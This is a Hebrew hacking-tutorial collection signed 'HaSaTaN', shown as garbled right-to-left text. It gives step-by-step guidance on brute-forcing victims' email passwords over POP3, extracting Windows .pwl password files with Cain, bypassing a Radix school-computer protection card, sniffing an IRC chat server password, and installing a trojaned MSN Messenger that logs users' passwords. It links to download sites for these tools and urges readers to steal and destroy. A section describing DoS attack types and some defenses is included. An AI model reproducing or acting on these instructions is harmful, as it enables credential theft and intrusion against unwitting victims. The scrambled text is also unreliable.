2 תרש וא (תרש( רברס !ורפל החלצהה לש םיזוחאה רועיש המ . ftp +ינורקלא ראוד וא )

:תובושת

1 יאדוול בורק (םירפסמ ןומה םאו הכורא אמסיסה םע (אמסיסה המ יולת (תעדל רשפא'יא .
רחאל התוא הלגת הנכותהש 6 .תועש
ןיב ךרעב חקי הז (תכבוסמ אלו הרצק אמסיסה םא לבא 15 'ל תוקד 30 .תוקד
2 . 20º
( םיתרשה בורש (הז הרוקש המ (ןכ (ןכ (םכינפ לע הלאשה ןמיס תא האור רבכ ינא ftp,
pop3,smtp,http תוסינכ םיהזמ םהשכש (םעפ דועו םעפ דוע םירזוח תונויסינ םירשפאמ אל ()
בשחמל םישועו (הפ חירסמ והשמש תוניבמ םה (הלוע רדסב תונויסינ םא (הז רחא הזב תויוגש
9N.
requiesd out אלש תרשב שגפיהל יוכיסהש הככ (ךישמהל ךל םיתנונ אל ופ (רמוא הזש (
!!הנק יד איה (ךכל ןיסח
+הז תא השוע ינא ךיא (ישעמה בלשל וישכע .יק.וא
+תאזכ הנכות גישהל לוכי ינא הפיא
:אבה רושיקהמ ילש רתאהמ ילורב חוכ תנכות דירוהל םילוכי םתא
www.geocities.com/d_k_hack/files/wwwhack.zip
( "צאפה תא וליעפה (םתדרוהש ירחא patch תא רוצעל רומאש () 30 .הנכותל םכל םינתונש םוי
+הז תא השוע ינא ךיא ליימיא וא (רתא !ורפלהצור ינא יתדרוהש ירחא (וישכע
.התוא חותפל ךירצ הנכותה תא םידירומש ירחא
:ירפת שי file - access - options .הלא לכו
'ל םיכלוה זא ACCESS
'ל םיכלוה םשו POP3 .םישנא לש ינורקלא ראוד תמסיס תולגל תורשפא םכל ןתונ
לא ןסחואמש ראודה תרש תא םימשור הבש סק תבית םש שי תאזה תורשפאה לע וצחלת
.תרשה תא ומשרת ןברוקה לש ראודה תבית
:בהז נרניא לש תרשה(
in.zahav.net.il
:ליימוה לש תרשה העו אל ינא םא
mailgw.hotmail.co.il
.....המודכו
)תרשה תבותכ המ םכל ודיגי םהו (הרבחה לא בתכמ חולשל םילוכי םתא
'ה #גאב וישכע USERNAME 'תורשפאב ורחבת ALWAYS USE THE USER NAME
אוה ןברוקה לש ראודה לשמל םא וישכע niv¡zahav.net.il
םושרל זא NIV 'ה #גאב password
ב ורחבתו read from thiz file .רושיא וצחלת
.דובעל ליחתהל רומא הז וישכע
!דובעי הזש תווקל קר רתונ " " "
( םיבשחמ תשר לשו סואודניוו לש תואמסיס םג (!ורפל רשפא ילורב חוכ תנכות םע novvel ()
.)הלחתהב יתרכזהש תוישה יתשב תשמתשמ אל איהש רמוא אל הז( תרחא הנכותה ושפ
(אמגודל cain .
:האבה תבותכב (ילש רתאהמ התוא דירוהל ןתינ
http://www.geocities.com/d_k_hack/files/Caine151.zip

:הלעפה תוארוה
'םשב !בוק ואצמת וכותב (פיזה !בוק תא וליעפה caine151 לש הרוצב icon !בוק לש ()תימלצ(
.הנקתה
.!בוקה תא וניקתה
רותפכה לע וצחל (הנכותה תא וליעפה (םתנקתהש רחאל cashed password ולש הנומת (
'םשב ןויליגב לש !בוקב תאצמנ cashed_password.jpg .
.תוחובמ תואמסיס םכל שי םהל םירתאה לכ תאו (םכלש תשרה תמסיס תא תוארל ולכות םש
++הא םיהדמ
(רותפכ לע וצחל screen saver 'םשב ןצחלה לש הנומת תפרוצמ ( screen_saver.jpg הנכותהו (
...אמסיסה םע רלא םכל !יפקת
תאמסס !ורפל ידכב (וישכע windows 'ה תמויס ילעב םיצבקה לכ תא קיתעהל םכילע ( pwl
תייקיתמ c:/windows
:ךכ הז תא ושע
תייקיתל (סודל וסנכ windows תייקיתב תיתמווא חתפנ אל סודה םע ( windows :וצחל cd
windows
ןוילקת וסינכה (וישכע A :ודילקהו םינוילקתה ןנוכ ךותל :
9N;
: copy `.pwl A
'יצבק םה המ הלחתהב (ונבתכ המ תוארל בלש בלש רובענ ואוב pwl 'יצבק ( pwl םיצבקה םה
לש תואמסיסה לכ םינסכואמ םב windows לש (רחא הרקמב וא novvel .
$ copy .קתעה תרמוא וז הדוקפ $
$ pwl דוע וכח (םיצבקה לכ תא חקיש בשחמל תרמוא $%$ 'ה (תישומיש דואמ הדוקפ וז $%.
:לשמל (וניבת היינש
תא תלמסמ (תילאמשה $%$ 'ה (םיגוסה לכמ (םיצבקה תומש לכ (רמוא הז (%.% :בתוכ ינאשכ
( םיצבקה גוס תא תלמסמ תינמיה $%$ 'הו (םיצבקה תומש exe, jpg, wav, mp3, doc .).."וכו
הז ירחא ונבתכו ()לאמש דצמ תיבכוכ ונבתכ( םיצבקה תומש לכ תא םיקיתעמ ונאש ונבתכשכ זא
$ pwl 'גוסמ קר םיצבקה תומש לכש רמוא הז $. pwl .
:$ A : ןנוכל הקתעהל הדוקפה ןבומכ הזש $ a
'ל םירזוח וישכע windows 'תשקה י$ע exit וא win הנכותה תא םיליעפמו ( caine םעפה (בוש
'ל ךלנ ונחנא pwl files :םשב תפרוצמ ןצחלה לש הנומת ( pwl_files.jpg
$ ןצחלה לע םתצחלש רחאל pwl files $ לע וצחיל $ files $ לע וצחלו ןוילעה ירפתב אצמנש $
add to list : ןנוכ תא וחתפ ()המישרל #סוה( $ A םתקתעהש )םיצבק( !בוקה תא וחתפו
תייקיתמ windows ה לע תינמי הציחל וצחלו pwl ול וסינכהו #רתצהש שדחה user name
וצחל .)שמתשמ םש( ENTER !בוקה לע וצחלו pwl !דובעל ליחתי אוהו (הלופכ הציחל שדחה
!בוק שי :הרעה jpg םשב #רוצמ caine !הנכותה לש תיללכ הנומת לבקל ולכות םש
HaSaTaN
9.*
Radix
סקידרה סירכ תפיקעל ךירדמה Radix )ןכ ילצא םיסירכה לכב חוב דבוע אל(
+סקידר הז המ לכ םדוק
)ותוא !ורפל םידמוע ונחנאו( בשחמה לש עדימה לכ לע ןגהלו רומשל רומאש סירכ הז סקידר
לש תרחא הביס לכו סוריו ( םיבושח םיצבק לש הקיחמ לש הרקמב עדימה תא רזחשל לוכיו
עדימב היעב
תונשל םיצבק קוחמל םיבשחמה תא סורהל םיצורש םידלי דגנ הזב םישמתשמ רפס יתב כ$דב
"וכו תורדגה
תא !ורפל תוסנל יתלחתה זא תושעל המ היה אלו םיבשחמ רדחב םמעושמ יתבשי דחא םוי
אציש המ הזו הנגהה
שי הככ זא 3 :תויש
1 )תורדגהה רופיש בקע תדבוע חוב אל( .
וצחיל בשחמה תא וליעפה F12 :תיורשפא שולש היהי סקידרה תורדגהל הסינכל
םיקסיד
קסיד'דראה
םורידיסו
ושיקה ךשמהל סקידר סירכ אצמנ אלש דיגי זאו תצק בושחי אוה קסיד'דראהב ורחיב Y
ל השיג םכל שי והזו תולעל ךישמיו בושחי אוה WIN !!!הנגה אלל
לבקתי הזש דע םימעפ המכ הז תא תושעל וכרצת םימעפל
םכתוא לילפהל לוכי הזו וראשי ונשתש םירבד לכש חוכשל אל
.םירמוג םתאש הרזחב ונשתו םתינשש רבד לכ ורכזת זא
ב.נ
תוקד המכל בשחמב תא תובכל וכרצת סקידרה תא הרזחב רוגסל ידכ

2 . תדבוע חוב אל םגו סוד בצמב קר םיצבק תונשל תורשפא תנתונ לבא תכבוסמ אל הינש היש
םיסירכה לכב
לש לוחתיא ןוילקתמ וליחתת WIN סודל ולעתו
!!! הנגה ןיא והזו
++ ךבוסמ
%%% תשרב םיבשחמ לש ליגר #ותישבו תפסונ הנגה תכרעמ ןיאש ךכ לע ססובמ ךירדמה לכ %%%
%%% םירחאב םג דבוע הז םא עדוי אל ינא %%%
3 ( חוב תדבוע . 99º יעוציב הז םלוכל אל לבא )
לוענ אל אוה םא בשחמה תא וחתיפ
!!התוא םתלכא לוענ םא !! םתס לוענמה תא ורבשת לוענ םא
9.+
וילע שיש דחא ושפחת םא חולה לע םיסירכ ינימ לכ םכל היהי בשחמה תא וחתיפ הרקמ לכב
וא הקבדמ
המכ הלאשה(...ותיא תושעל המ ועדתש םכילע ךמוס ינאו (סקידר תרבח לש הזש רמואש והשמ
.) )': םלשל םיצור םתא
%%%
%
השדח הסריג וא רחא והשמ םכלצא שיש הארינכ ושקעתת לא דבוע אל םא םימעפ המכ וסנת
.ושעתש תויושל ירחא אל ינא הרקמ לכב
!!ונהת
HaSaTaN
CHAT
....םיא"צ לע רמאנ אל המ םיא"צ םיא"צ (םיא"צ
אצמנ לזאזעל הפיא לבא (קרימה ךרד םיא"צל סנכיהל םתיסינ םכלכש חוב ינא (!קציקהא
!ולש אמסיסה המו "צה
:איה "צה לש תבותכה
www21.brinkster.com/nof/chat.asp
!םויה ונלש םייוסינה לכ תא השענ המש
תבותכהמ !ה'ל'ו'ע'מה רפינס'קאפה תא ודירוה םכל יתאבהש תבותכל םתסנכנש ירחא
:האבה
Ftp://Ftp.tamos.com/cv3.zip
תא דירוהל ורמגתש דע וכח ושפ ("צל קינ ומשרית לע ןיידע( הדובעל (הללאיו וניקתת
(השוע אוה המ ךרעב ןיבהל םילוכי םתא רפינס קאפה תא םתלעפהש רחאל הככ זא ()הנכותה
תא ךל הארמ רפינס קאפה (רקאה לש בשחמ לכב דואמ בושח ילכ אוה רפינס קאפה
הייסירכל היינש וסנכ (ןופלה'יווק ךרד ךלש בשמחל םילבקתמש םיקאפה IP statics (
'ה לכ תא תוארל ולכות המש IP'S לכ תא םג םכל הארי הז (תעכ םהילא םירבוחמ םתאש
ותואב םיחותפש םירופה IP :וארת םתא זא (
ip statics ports
80 ( 6667 x.x.x.x
'ה לע תינמי הציחל !וחלל םילוכי םתא IP :ו show all ports :םכל הארתש אספוק עיפות
6667 ( 80
קרימ HTTP
'ה תא ונל שי רבכ זא IP :בותכלו קרימל תכלל רשפא זא (תרשה לש
/ server x.x.x.x 6667
:הרק המ וארת ' הא (הרוק המ הארנ
error no previliges
:הככ םצעב ךלוה הז זא (אמסיס ול שיש תרש םא קסע הפ ונל שי (!קציק הא
/ server x.x.x.x 6667 ```PASSWORD
!א'מ'ס'י'ס'ה ת'א ו'נ'ל ן'י'א ל'ב'א
+םישוע המ
'ה תבותכ תא ונל הארמ קר אל (רפינס'קאפה םתנבהש יפכ זא IP אלא םירופה תא קר אלו
'ה תאו םיקאפה ןכות תא םג FLAGS :הבתכב וריפ רתיב רבסומ( ip_spoof.txt :הככ זא ()
תרשה לש יפ יאה לע תינמי הציחל וצחל IRC ורחיבו ונלש jump to ורחיב םשו first packet (
9.9
לכ תאו (תרשהמ וישכע דע ונליקש םיקאפה לכ לש תיקנע המישר תוארל לכונ המש
.ונחלשש םיקאפה
ונחנא הנהו םיינועבצ םישוקשק ינימ לכ ויתחתמ שיו (ןמוסמ םיקאפהמ דחאש םיאור ונחנא
:בותכ #וסב םיאור
אמסיסה יהוז (והשלכ שובריח
:בותכלו קרימל תכלל הז תושעל רתונש המ לכ (ונלש אמסיסה וז (והז
/ server IP.IP.IP.IP 6667 PASSWORD
!דבוע הזו
!!!!!!םיאור םתאש המ לכ ובנגתו (וצפשת (וסרהת (ופייכת זא (בינגמ ושפ (בינגמ
)תיבה ןובשח לע(
HaSaTaN
CHOKE
!שונשינ םתס קר אלא (דחוימ והשמ תויהל הרומא אל תאזה הבתכה זא (בו
!התוא ובהאות םכבורש הווקמ ינא לבא
ארקינש רבד שי (ןיינעל שגינ זא choke ()ךשמהב םירפ(
'ה choke (ןברקה לש בשחמה לע הארנ יתליב היהי ()$סוריוו$ ול וארקת וצרית וא םע( הזה
'ה (ןושאר רבד choke תערפה אלל רישי רשק לש רופ תועצמאב איהש לכ החיש י$ע רבעומ
ןוגכ (תרש irc ()קרימ( icq, msn MESSNEGER 'ה (המודכו וגידוא ( choke התאש ןמזב (
םע רבדמ דיגנ xy 'ל xy 'ה !ר choke מ עורג רתוי הזש 20 !היינש לכ םיצנצנמ םיפוצרפ
םג סוריווה )וישכע שממ( (עגרכ (וילע לתשמו (ולצא חתפנ סוריווה (ךתיא רבדמ והשכ הז עגרב
'ה תא אל סרוה bios :האבה העדוהה תא ךל חלושו
דועו םעפ דוע הז תא ךתוא לאשי אוה ($+++אלב אלב אלב לש קחשמ דירוהל הצור התא (דיגת$
( !!!!סוריווה הז (אוה אל הז לבא (םעפ cool ...)
םתא (סוריוו הזיא שחנל תוסנל םיחילצמ אל םתא םאו (סוריוו םצעב אוה ($קחשמ$ה
!!!םיקופד
'ה הז יכ choke !ומצע
'ה ךכ choke הזה סוריווה תא םהל שי הפיאמ יתוא םילאוש םישנאשכו (דחאל דחאמ רבוע
'ה םירקימה בורב הז (בשחמה תא םהל קפדש choke !
:היעבה
!תרושקיתה תשרל #סותכ ותוא ההזי ()בשחמה( סוריוו ינאה
)!הלש ןורתפה הככ (הנק היעבהש המכ :בושח ללכ ורכזת( :ןורתיפה
:לע וצחיל
:ובתיכו .''''תויקיתו םיצבק.''''שופיח.''''לחתה choke
.הזה סקה !בוקמ !וח (וקחמ (ואצמתש !בוק לכ
HaSaTaN
9.3
DNS דבוע הז ךיא
ללכב הז המ DNS +
םימשור םתאשכ ' ךיא (םעפ םכימצעל םתבשח host ( והשלכ www.walla.co.il )אמגודל
'ל הז תא םגרתל ךיא עדוי $נרניא$ה IP +++
:ל רבחתהל םיסנמ םתאשכ תושחרתמ תואבה תולועפה www.walla.co.il
1 'ה תרש . DNS שפחמ IP
2 ותואל רבחתהל הסני בשחמה (אצמ אוה םע . IP רופב 80
3 :תדוקפ חלשי בשחמה רבכ (ןאכ . get /index.html לש רוקמה'דוק תא בשחמל הדירומש
#דל ותוא תמגרתמ םכלש בשחמבו (#דה HTML !קלחו יקנ
!הלודגה הלאשה תא ןיבהל םירומא םתא (דבוע הז ךיא לע תצק ונרבסהש ירחא זא
תרש לעופ לזאזעל ךיא DNS 'ה המ עדוי אוה הפיאמ + IP +++ חדינ סוה הזיא לש
.הככ זא
תרש לכל DNS ןימ שי ( DATABASE :תאזל המוד המישר הלב ןימב םינסחואמ המשש
host ip
23.233.6.1 org
24.124.4.3 com
23.143.5.9 net
'ל םירבחתמ םתא (דואמ ושפ DB 'ה לש DNS ונדלקה דיגנו www.walla.co.il 'ב DB ונחנא
'ל םיכלוה HOST :ל םשו CO.IL ונל איבמ הזו IP םירמגנש םירתאה לכ לש תשר ןמ הז םשש
' CO.IL .
(!ראהמ םירתאל דנליאתמ סנכיהל לוכי תייה אל ...אל םא (המישר התוא תא הנשי םלועה לכב
'ה יכ DNS . ריכמ היה אל המש CO.IL :דוגיא ןכל ICANN עבק )הז המ יתוא ולאשת לע(
'ה תומישר לכש DNS .רבד ותוא ויהי
9.:
'ב םישמתשמ םתא בהז נרניאל םירבוחמ םתאשכ ' ןכלו DB 'ה לש DNS SERVER
!םהלש
.דמחנו ושפ
'ה לע יארחאש והשימ הזיא שי םאש (בשוח תייה DB ינוילמל תונשל לוכי אוה זא (הלאה
תא םישנא www.cnn.com םאו (ןמזה לכ היינשהמ תחא תונכדעתמ םמצע תומישרה !אל לבא (
רשפא'יאש הככ (הילע ועיפשי תורחאה יכ התייהש המל הנתשת דימ איה ' הנתשמ תחא
לש תומישר תונשל יאדכ רבד םוש תושעל DNS תרשל !ורפת םא םגו ( DNS רסח היהי הז '
!יתוירחא לע ' תלעות
!ןמא קנחיתשו ייב
HaSaTaN
תופקתה DoS
תופקתה Dos תופקתהב DoS התרמש (תרשה וא תשרה לע יהשלכ הלועפ עצבמ ינודז םדא (
.תפושה םתוליעפל עירפהל
.הליחז ידכל אמ והש ינפל הרובעת לש תלבגומ תומכב לפל לגוסמ נרניא תרש (המגודל
ילכ רידגהל רשפא ping בשחמה .םיוסמ תרש לא םינותנ תונמ הבר תוריהמב חלשיו רוזחיש ךכ
תושקב לש םוצעה רפסמב לפל !לאנ רשא (חראמה ping תויהל לולע (עתפל וילא תועיגמש
.תויתימא םינותנ תושקבל ביגהל ידכמ קוסע
תוליכמה תונמ וא יופצ אל לדוגב תונמ חלשי רשא תוריש ילכ רידגהל לולע !רופ (רחא הרקמב
.ולש הבוגתה תא אהל וא ולש הריצעל (תרשה לש הסירקל םורגיש רבד (םייופצ אל םינותנ
תופקתה DoS םירחאמ עונמל אוה תושוע ןהש המ לכש ללגב (!רופל דחוימב תוישומיש אל
םישרומ םישמתשממ תוענומ אלא (המינפ !ורפל ךרד ול תוקפסמ אל ןה ' תכרעמב שמתשהל
תשרה יתורישב הערפה הלח רשא (ןברוקל הכובמ םורגל הלוכי תאזכ הפקתה .תורישל רבחתהל
ינורקלא רחסמ רתא (המגודל ךמצעל ראתת .הסנכה ןדבוא וא תוחוקלה תא תרשל תויעב (ולש
תפקתה ללגב סרקש DoS העש לכ .הרבח לש דיחיה הסנכהה רוקמכ שמשמ הז רתא רשאכ (
.#סכ דואמ הברה הרבחל תולעל הלוכי ליעפ אל תרשה הבש
ה תופקתה בור (לבא DoS םישנא לש (םירקמ הברהב וא( םיצרופ לש םיינונק תונויסינ ןה
.תפסונ הרמ אלל (הרכהו בל תמושת ךושמל וא חוכ םשל חוכ ליעפהל )םיצרופ תויהל םיצורש
תפקתה SYN תועדוה חלוש חוקלה (תרשו חוקל ןיב הליגרה תורשקתהה ךלהמב SYN תרשה (
תעדוהב ביגמ SYN-ACK תעדוהב ביגמ חוקלה #וסבלו ACK םינותנו (רושיקה רצונ הז בלשב .
.תרשהו חוקלה ןיב םורזל םילוכי
גוסמ הפקתה SYN תנשב הנושארל התהוז ( 1996 תועדוה תרשל תחלוש ( SYN רשא תובורמ
תועדוהב לפל הסנמ תרשה רשאכ .הנימז הניא השעמלש (יהשלכ תבותכמ הרואכל תועיגמ
SYN תועדוהב לפל םינימז םיבאשמ דוע ול ןיא (רוביח תומושר תאצקה י$ע ולא SYN
.םישרומ םישמתשממ תויתימא
תופקתהב לופיל םיאל וצפוה תובר הלעפה תוכרעמ רובע SYN םינוקית ומסרופ ןכו (
.הז גוסמ תופקתהב לפל םיתרשל םיעייסמה (ןהיתרדגהל
9.=
תופקתהב לופיל הלעפה תוכרעמב םויכ תונבומה תויגולונכהמ תודחא SYN תויגוע$ צונוכמ
SYN $ תויגוע$ וא $ RST תשקב לש הלבק םע . SYN 7רוביח תומושר תידימ הצקמ אל תרשה (
רוביח ןויסינב רבודמ ןכאש רשאי רשא #סונ עדימ השקבה רוקממ שקבמ אוה תאז םוקמב
.הפקתהב אלו יתימא
תויגוע לש הרקמב SYN העיגמ םא 7רוביחה רובע דחוימ ירודיס רפסמ הרזחב חלוש תרשה (
הרקמב .רוביח תומושר הצקמ תרשהו (יתימא רושיקב רבודמ (ירודיס רפסמ ותוא םע הבושת
תויגוע לש RST חלוש תרשה ( SYN-ACK העדוהב ביגמ שקבמה םא .שקבמה לא הרזחב יוגש
.רוביח תמושר הצקמ תרשהו (תיתימא רוביח תשקבב רבודמ (שבתשה והשמש
תפקתה Land תפקתה Land תופקתהל המודב ( DoS חראמה בשחמה תסירקל תמרוג (תורחא
םשוימ ובש ןפואב גאב לוצינ י$ע TCP/IP הז גוסמ הפקתהב .תומיוסמ הלעפה תוכרעמב
תנמ תחלשנ SYN תולוכי ולא תופייוזמ תונמ .םיפייוזמ רופ רפסמו רוקמ תבותכ הליכמה
.עקתיהל וא סורקל חראמה בשחמל םורגל
עונמל ידכ (#סונב .יאל תנקתה וא תכרעמה ןוכדע י$ע הז גוסמ תופקתה םע דדומתהל רשפא
הנמ לכ םוסחתש ךכ $שאה תמוח$ תא גפנקל לוכי התא (ךלש תשרהמ הז גוסמ תופקתה תאיצי
.ךלש תוימינפה תובותכה תחאמ הנוש התבותכש תאצוי
תפקתה Smurf תפקתה Smurf תפצהל תומוד הז גוסמ תופקתה .הפקתה לש קיתו גוס איה
ping ה תנמב תבותכהו תרתוכה םלוא ( ping דעיכ רחבנש בשחמב הרוקמש המדנש ךכ ונוש
תונמ לש בר רפסמ .הפקתהה לש יפוסה ping היושע ןהמ תחא לכ רשאכ (תורדושמ תופיוזמ
לופכ רפסמ ךכו (תפיוזמה תבותכל בישמ הזכש בשחמ לכ .םיחראמ םיבשחמ תואמ י$ע לקיהל
וא תכרעמה תסירקל םרוג וא םיבאשמה לכ תא לצנמ (דעיה תכרעמ לא עיגמ תובוגת לש לפוכמו
.התועקתהל
תונברוקל #קותהמ תוחלשנ תונמה .וז הפקתהמ םילבוס םייניבה יידעי ןהו הפקתהה דעי ןה
.םינווכומ ירודיש ורשפאיש ךכ ןהלש םיבתנה תורדגה יוניש ךות (םייניב תותשר ךרד רקיעב
ךלש תשרב םיבתנהש אדוותש ידכ הז גוסמ תופקתהל ןיעדוי אלב עייסמ ךניאש אדוול לוכי התא
תותשר קורסל ולחה םינוגרא רפסמ (הנושארל והוז הז גוסמ תופקתה רשאכ .יוארכ םירדגומ
תומכ החנצ ךכמ האצותכו (תותשר ןתוא ילהנמל ךכ לע ועידוהו םייתייעב םיבתנ רחא שופיחב
.תיתועמשמ הרוצב הז גוסמ תופקתהה
#ויז IP #ויז IP חוקלה .הנמה רוקמב תועל ול םימרוג רשאכ חראמל הנמ תחילש ותוהמ
תעדוה חלוש #קותה SYN חראמה בשחמה .םייוגש רוקמ רופו רוקמ תבותכ הליכמ רשא
תעדוהב בישמ SYN-ACK .עיגהל הכירצש תיפוסה הבושתל הצחמל חותפ רוביח םע ןיתממו
םישדח םיפיוזמ םירוביחל תושקבה םלוא (הז הצחמל חותפ רוביח לש ופקות גפ רבד לש ופוסב
קוסע חראמה בשחמה רבד לש ופוסב .םירוביחה #קות גפ הבש תוריהמהמ רתוי רהמ תוחלשנ
תעינמל איבמש המ (תויתימא תושקבב לפל לוכיש ידכמ ולא םיפיוזמ םירוביחב לופיב ידמ
( תורישה DoS .)
םיכרד תומייק .הז גוסמ תופיוזמ תועדוה תעגה עונמל ירשפא יתלב אל םא השקש תורמל
עונמל לוכי התא (ןכ ומכ .רוביח ןויסינ לש ופקות גפש ד ןמזה רוציק ןוגכ (ןהיקזנ תא ןיקהל
תבותכש תואצוי תונמ וננסיש ךכ ךלש םיבתנה תרדגה י$ע ךלש תשרהמ הז גוסמ תופקתה תאצי
.ךלש תשרה תא תמאות הניא ןהלש רוקמה
תפקתה Teardrop תפקתה Teardrop תפקתה איה DoS וא ותסירקל םורגל הלוכי רשא
םינקתמ רשא םיאל וא םיגורדש שי הלעפהה תוכרעמ בורל יכ םא דעי בשחמ לש ותועקתיה
.ולא תופקתה תולצנמ התואש השלוחה תדוקנ תא
תונמ IP לש לדוגל עיגהל תולוכי k64 לפל םילוכי אל תותשרה לש הרמוחה יביכר בורל םלוא (
תובכרומו לופיל םינתינ םיקלחל ךרדה ךרואל תוקרופמ תונמה (וז הביסמ .הז לדוגב תונמב
תנמ לש תרתוכה .דעיל העגהה םע שדחמ IP לש שדחמ הבכרהל שורדה עדימה תא הליכמ
קלח ךייש הנמב ןכיהלו הלוכ הנמה לדוג המ (הנמ לש קלח הווהמ עדימה םאה ללוכ (הלוכ הנמה
.הז
9.J
תופקתה Teardrop תונמ תוחלוש תומוד תופקתהו TCP וא UDP (היוגש תרתוכ תוללוכ רשא
הלולע האצותה .יוגש עדימ לע ססבתהב המלש הנמ שדחמ ביכרהל הסנמ חראמה בשחמהש לכ
.דחוימב םיייא םיעוציב וא תועקתיה (הסירק תויהל
תפקתה Ping Of Death לש הלעפה תוכרעמב גאב תלצנמ הצמשל העודיה הז גוסמ הפקתה
(תונולח (סקינוי לש תובר תואסריג ללוכ ' תותשר macOS חראמה בשחמל םרוג רשא ' דועו
תנמ לבקמ אוה רשאכ עקתיהל וא סורקל ICMP Echo Request לע הלוע הלדוגש k64 .
גוסמ הפקתה םע תודדומתהל יאל וא ןוקית שי הלעפהה תוכרעמ לש תונורחאה תואסרגה בורל
תוססובמ תופקתהמ ענמיהל תנמ לע (םלוא .הז ICMP תא רידגהל לוכי התא(םיגוסה לכמ
תשקב לכ םוסחתש ךכ ךלש $שאה תמוח$ ICMP ידה וא תובוגת אל םלוא (תסנכנ ICMP
חולשל לכוי אל ךלש ןוגראל !וחמ שיאש איה האצותה .םיסנכנ ping םיחראמה םיבשחמ לא
תושקב חולשל ולכוי תשרה ךותמ םישנא םלוא (ללכ ךרדב רתוי חובש המ (םיימינפה ping
תנמ לע $שאה תמוח$ יללכב םייוסינ ךורעל ךילע היהיש ןכתיי .םסחיהל ילבמ ורזחי תובוגתהו
.םיילמיפוא םיעוציבל עיגהל
תופקתה DoS תופקתה בור תופסונ DoS (םלוא .יתראיתש תופקתהה לש ןהשלכ תואסריג ןה
אלש םיגאב לע ססבתהב (תושדח תופקתה אוצמל וחילצי םיינשקע םיצרופש קפס םוש ןיא
.תונוש הלעפה תוכרעמב ןיידע ורתוא
HaSaTaN
ל הצירפ MSN MESENGER ו YAHOO MESENGER
!ייה
'ל המסיסה תא םישנאל בונגל ליבשב הנכות םכל יתינבו יתבשי בו EMAIL .ר"גנסמלו
מ םתוא דירוהל וא הז רפס םא םיצבקה תא דירוהל רשפא %
www.topcities.com/hackerim/herut.zip
הנקתה :
.)המל םינוקיאהמ םג( לעופ םא ירוקמה ר"גנסמה תא רוגס '
!בוקה תא לעפה ' Messenger.exe .
....!בוקה תא #ילחהל םיצור םא הלאשב ןכ וצחלת '
.שדחה ר"גנסמה תא ורגיס '
.םעפ דוע ותוא וליעפת '
!בוקל סנכת ודילקיש המסיס לכ תינורקע זא רדסב לכהו תויעב ןיא םא c:\messenger.txt
הרסה :
!בוקה תא לעפה ' MsnRestor.exe .
.$רזחש$ לע !חל '
!הלחתהב ומכ לכה והזו
HaSaTaN
9.N
FTP
'ה לוקוורפ לע תצק ריבסי ינא םויה (םלוכל םולשו (ייה FTP .)!םיברעל תוומ(
:הבתכה לש סקדניאל רשי שגינ םישוקשק ילב זא
'ה תרמ יהמ % FTP
'ב םישמתשמ דציכ % FTP
'ב שומיש % FTP רתאל הצירפל רזעכ
'ה תרמ יהמ FTP
:הככ זא (יקוא
'ה לש ךרדה תליחתב FTP 'ה שמיש FTP ןיבל םניב םיצבק ריבעהל וצרש תוירחסמ תורבחל
'ב םמצע ONLINE 'ה אצמוה ךכ םשל ( FTP 'ה ( FTP הרוצב גוס לוכמ םיצבק רבעמ רשפיא
.)"וכ ליימיא (נל( רחא רבד לכמ רתוי הריהמו רתויב החונ
'ה תרש ךותב FTP 'ה לש ירקיעה ביכרה (םיביכרמ רפסמ םנשי ומצע FTP 'ה אוה ADMIN
'ב םג ' ןכ (ןכ FTP 'ב ומכ NOVELL ונשי אמגודל ADMIN יתרשבש אוה ידיחיה לדבהה (
'ה FTP 'ה ויהשו םויה םיירחסמה ADMIN ראש וליאו (םתוא קוחמלו םיצבק תולעהל לוכי
'המ תרחא אמסס םילבקמש םישמתשמה ADMIN .םיצבקה תא דירוהל קר םתלוכיב
יפ הלודג תוריהמב עדימ תרבעה הרשפיא וזה השידחה היגולונכה 2 .רחא רבד לכמ
'ה ' םויכ FTP תרשה :אמגודל (םירתאל םיצבק תאלעה ךרוצל םג שמשמ GEOCITIES
'ב ךמות )ןמאנה םכרתא ןסכואמ וילעש( FTP :איה ותבותכ ( FTP.GEOCITIES.COM קר
ילש רתאב םישנאה ' ןכש המ (קוחמלו םיצבק תולעהל תושרה תא שי תרשב קלח לעבכ ' יל
'המ םיצבק דירוהל ולכוי FTP !םשפנ תוואכ ילש
'ב םישמתשמ דציכ FTP
םנשי 3 יתרשב שומישל םיכרד FTP :
1 :ןה רתויב תובוה ' םהיניבמ (#סכ תולועש תונכותה ןבומכ והז ' הנושארה ךרדה . cute-ftp
'ו WSFTP .
9..
םע (םירקאה לש תועיגפ ינפמ תוניסח אל שממ תונכותה (תצלמומ אל שממ תאזה הישה
.תואמסיסה לכ תא קיתעהל ןתינ ' ושפ סאבנ ןיירמ
.ילמרונ םיקארק רתא לבב וללה תונכותל )םיקארק( םי"צאפ דירוהל ןתינ :הרעה
2 ןפדפד והז ()וזה הישב שמתשמ ינא הרקמ לוכב( רתויב בוה יתעדל הזו ' הינשה ךרדה .
'ה FTP האבה תבותכה תא ושיקהו נרניאל ורבחתה (אמגודל (םכלש ררולפסקאה לש
:ררולפסקאבש תבותכה תרושב
ftp://d_k_hack¡ftp.geocities.com
ןמ הז וארת דימ םתאש המ (ןכש חיננ +םתצחל ' יקוא ALERT םתא הבש )העדוה תבית(
:םכל יתתנש תבותכה תא חתננ ואוב (אמסיס סינכהל םישקבתמ

תרש לש תבותכ לכ הליחתמ ' וב תבותכב ליחתמה ןמיסה תא תוארל רשפא .א FTP 'ה והז
:// ftp .
'ב ילש שמתשמה םש תא םיאור ונא הז ירחא דימ .ב GEOCITIES :הרקמב הזש(
d_k_hack .אמסיס שורדת ןבומכ תרשל שמתשמ'םשה תאבה )
םא סנכיהל ושפ רמוא הז .ילש שמתשמ םשה ירחא אצמנ = ןמיסה תא םיאור ונא .ג user
.= 'ה ירחא אוביש המ לא הזה
'ה תרש תא םיאור ונא #וסבלו .ד FTP :הזש ומצעב ftp.geocities.com .
'תרש לש תבותכ לכ היונב ןורקיעב ךכ FTP .
'ה יתרש גוס םיתרש לש דחא גוסמ (!וח ANONYMOUS םירוזפ הלא םיתרש ()ימינונא(
.ימינונא ןפואב םיסנכנ ושפ םה אמסיס םוש םישרוד אל םהו תשרה ינפ'לע בורל
ןיאב ושל םילוכי םישנא המש (םילודג תונכות ירתא לש םיתרש םה הלאכ םיתרש (כ$דב
.עירפמ

'ה תרשל סנכיהל םוקמב :הרעה FTP :ךכ ftp://xx¡xx.xx.xx תא דילקהל הז ירחאו
:תבותכה תרושב ךכ בותכל ושפ רשפא ' אספוקה ךותב אמסיסה ftp://xx:yy¡zz.zz.zz
:שכ
xx .שמתשמ םש -
yy .אמסיס -
zz .תרשה תבותכ -
3 .תחבואמ יכה לבא (תכבוסמ יכה ' תישילשה ךרדה .
